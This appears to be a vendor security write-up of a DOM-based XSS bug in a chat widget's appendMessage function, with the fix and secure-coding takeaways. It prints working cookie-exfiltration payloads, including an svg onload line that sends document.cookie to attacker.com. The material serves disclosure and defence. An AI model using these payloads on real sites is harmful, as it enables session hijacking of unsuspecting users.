The Vulnerability Explained
The voice assistant widget's appendMessage function is responsible for injecting chat messages into the DOM. The original implementation treated user and bot messages asymmetrically:
const content = className === 'user-message' ? escapeHTML(text) : text;
msgDiv.innerHTML = `<div class="message-content">${content}</div>`;
The problem: User messages are passed through escapeHTML(), which converts characters like <, >, and " into HTML entities. Bot messages are inserted raw. An attacker who controls bot response content—or whose input is reflected through the bot backend—can inject a payload like:
<img src=x onerror="fetch('/steal-session', {method: 'POST', body: document.cookie})">
When this string is assigned to innerHTML without escaping, the browser parses it as an HTML element, registers the event handler, and fires it immediately. The attacker now exfiltrates the user's session token.
The vulnerability is DOM-based XSS because the injection occurs on the client, through the DOM API (innerHTML), after content has been received from the server. The trust boundary—the assumption that bot responses are safe—was misplaced.
Attack Scenario
- An attacker discovers a way to influence bot responses: perhaps the bot service accepts a user search parameter and returns results, or it summarizes a user-uploaded document.
- The attacker inputs:
Test<svg/onload="new Image().src='http://attacker.com/log?cookie='+document.cookie"> - This input is stored in the bot's knowledge base or processed by a generative model.
- When a victim user triggers a bot response containing this payload, the SVG element loads and fires the
onloadhandler, sending the victim's cookies to the attacker. - The attacker uses the stolen session cookie to impersonate the victim.
This attack is particularly dangerous because victims see no visual indication that JavaScript was executed—no popup, no error, just a chat message that looks benign.
Affected Versions
| Affected | Not applicable (first-party code) |
| Fixed in | Not applicable (commit-level fix) |
| Ecosystem | N/A |
| CVE / GHSA | Not assigned |
| CWE | CWE-79 (Improper Neutralization of Input During Web Page Generation) |
This vulnerability exists in the currently deployed version of the voice assistant widget. Since the code is first-party, there is no version string; the fix should be deployed as part of your next release cycle.
The Fix
The solution is to eliminate the asymmetry: escape all message content before DOM insertion, regardless of origin.
Before:
const content = className === 'user-message' ? escapeHTML(text) : text;
msgDiv.innerHTML = `<div class="message-content">${content}</div>`;
After:
const content = escapeHTML(text);
msgDiv.innerHTML = `<div class="message-content">${content}</div>`;
This single-line change applies escapeHTML() uniformly. All HTML special characters—<, >, ", ', &—are converted to entity references. Legitimate text renders normally; malicious markup is neutralized.
Why this works:
- Event handlers cannot fire if the tags themselves are escaped. <img onerror=…> becomes the string <img onerror=…>, which the browser renders as text, not as an element.
- Script tags are visible as text, not executed. A payload like <script>alert(1)</script> is displayed to the user as literal text, alerting them to the injection attempt.
- No loss of functionality for legitimate messages. If a bot needs to send rich formatting, that content should be pre-rendered on the backend and sent as a safe, pre-escaped template—not as raw HTML.
The regression test in the PR confirms this behavior across adversarial payloads:
- Script injection (<script>malicious()</script>)
- Event handler injection (<img onerror="alert()">
- SVG-based injection (<svg/onload=…>)
- Data URL iframe injection
All are neutralized and rendered as inert text.
Key Takeaways
-
Never assume bot or backend responses are safe just because they originate from your own server. If the backend accepts any user-controlled input—search terms, document uploads, external API responses, database records—that input is untrusted at the client and must be escaped before DOM insertion.
-
innerHTML+ unsanitized data = XSS. Always. Even a single code path that skips escaping breaks the security boundary. UseinnerHTMLonly with content you control; prefertextContentfor user-visible text and templating libraries for dynamic markup. -
The
classNamecheck is not a security control. Checking the message type (user vs. bot) is a UI concern, not a trust boundary. Trust boundaries must be based on data provenance (trusted vs. untrusted), not message metadata. -
Asymmetric security logic is a red flag. If user input is escaped but bot input is not, ask: why? If you cannot articulate a cryptographic or process-based reason to trust the bot source, apply the same defense to both.
-
Test with actual XSS payloads, not just valid input. The regression test in the PR includes four distinct XSS vectors; your own test suite should do the same for any user-facing rendering.
How Orbis AppSec Detected This
Source: Bot response text parameter passed to appendMessage() function.
Sink: innerHTML assignment in the appendMessage function, which renders the message into the DOM.
Missing control: HTML escaping was conditionally applied based on className, allowing bot messages to bypass sanitization.
CWE: CWE-79 (Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')).
Fix: Apply escapeHTML() to all message text uniformly, regardless of origin.
Orbis AppSec automatically detected this vulnerability and opened a pull request with the fix. Try Orbis AppSec on your repositories to find and fix issues like this automatically.
Conclusion
DOM-based XSS in UI widgets is insidious because the vulnerability lives on the client, where it is invisible to server-side security monitoring. The voice assistant widget's treatment of bot messages as inherently safe was a common mistake—one that conflates message origin (internal service) with message trustworthiness (safe content).
The fix is minimal and surgical: escape all user-facing text before DOM insertion, with no exceptions. This is a foundational principle of secure client-side rendering and should be applied everywhere innerHTML, textContent, or similar APIs are used to render data sourced from any API or user input channel.